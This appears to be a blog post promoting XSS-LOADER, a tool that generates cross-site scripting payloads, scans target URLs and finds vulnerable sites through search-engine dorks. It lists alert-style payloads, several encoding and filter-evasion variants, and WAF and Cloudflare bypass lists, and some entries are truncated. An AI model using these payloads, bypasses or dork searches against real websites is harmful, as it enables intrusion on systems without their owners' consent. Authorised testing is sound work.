SHARE
XSS-LOADER : Xss Payload Generator, Scanner & Dork Finder

XSS-LOADER is a all in one tools for XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER and this is written by Hulya Karabag.

  • This tool creates payload for use in xss injection
  • Select default payload tags from parameter or write your payload
  • It makes xss inj. with Xss Scanner parameter
  • It finds vulnerable sites url with Xss Dork Finder parameter

How to use?

Installation

git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

Usage

python3 payloader.py

Features

  • Basic Payload
    • Sets default parameter to : <script>alert(1)</script>
  • Div Payload
    • Sets default parameter to : <div onpointerover='alert(1)'>MOVE HERE</div
  • Img Payload
    • Sets default parameter to :<img src=x onerror=alert('1');>
  • Body Payload
    • Sets default parameter to : <body ontouchstart=alert(1)>
  • Svg Payload
    • Sets default parameter to : <svg onload=alert('1')>
  • Enter Your Payload
    • Encodes payload writed by user
  • Payload Generator Parameter
    • Encodes payload on selected tag

Also Read – XSHOCK : Tool To Exploits ShellShock

  • UPPER CASE—->
  • UPPER AND LOWER CASE—->
  • URL ENCODE —–> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
  • HTML ENTITY ENCODE—–> <script>alert(1)</script>
  • SPLIT PAYLOAD —–> pt>>alert(1)pt>>
  • HEX ENCODE —–> 3c7363726970743e616c6572742831293c2f7363726970743e
  • UTF-16 ENCODE —–> Encode payload to utf-16 format.
  • UTF-32 ENCODE—–> Encode payload to utf-32 format.
  • DELETE TAG —–> “;alert(‘XSS’);//
  • UNICODE ENCODE—–> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
  • US-ASCII ENCODE —–> ¼script¾alert(1)¼/script¾
  • BASE64 ENCODE —–> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
  • UTF-7 ENCODE —–> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
  • PARENTHESIS BYPASS —–>
  • UTF-8 ENCODE —–> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
  • TAG BLOCK BREAKOUT—–> “>
  • SCRIPT BREAKOUT—–>
  • FILE UPLOAD PAYLOAD—–> “>.gif
  • INSIDE COMMENTS BYPASS—–> –>
  • MUTATION PAYLOAD—–> “>
  • MALFORMED IMG—–> “>
  • SPACE BYPASS—–>
  • DOWNLEVEL-HIDDEN BLOCK—–>
  • WAF BYPASS PAYLOADS—–> Show Waf Bypass Payload List
  • CLOUDFLARE BYPASS PAYLOADS—–> Show Cloudflare Bypass Payload List
  • POLYGLOT PAYLOADS—–> Show Polyglot Bypass Payload List
  • ALERT PAYLOADS—–> Show Alert Payload List
  • ALL CREATE PAYLOAD—–> Show Create All Payloads
  • GO BACK MAIN MENU
  • EXIT

Xss Scanner

Initially you’ll need to enter url of target Please enter the url like this example==>e.g target —–> http://target.com/index.php?name= Selected for scanning payload list

BASIC PAYLOAD LIST ==> Payload list consisting of script tag
DIV PAYLOAD LIST ==> Payload list consisting of div tag
IMG PAYLOAD LIST ==> Payload list consisting of img tag
BODY PAYLOAD LIST ==> Payload list consisting of body tag
SVG PAYLOAD LIST ==> Payload list consisting of svg tag
MIXED PAYLOAD LIST ==> Payload list consisting of all tag
ENTER FILE PATH ==> Payload list determined by the user ,Please enter the url like this example..! (e.g. path —–> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

Results will be added in “vulnpayload.txt” after scanning.

Xss Dork Finder

First enter the dork for searching: e.g—->inurl:”search.php?q=” Results will be saved in “dork.txt” after scanning.

Screenshot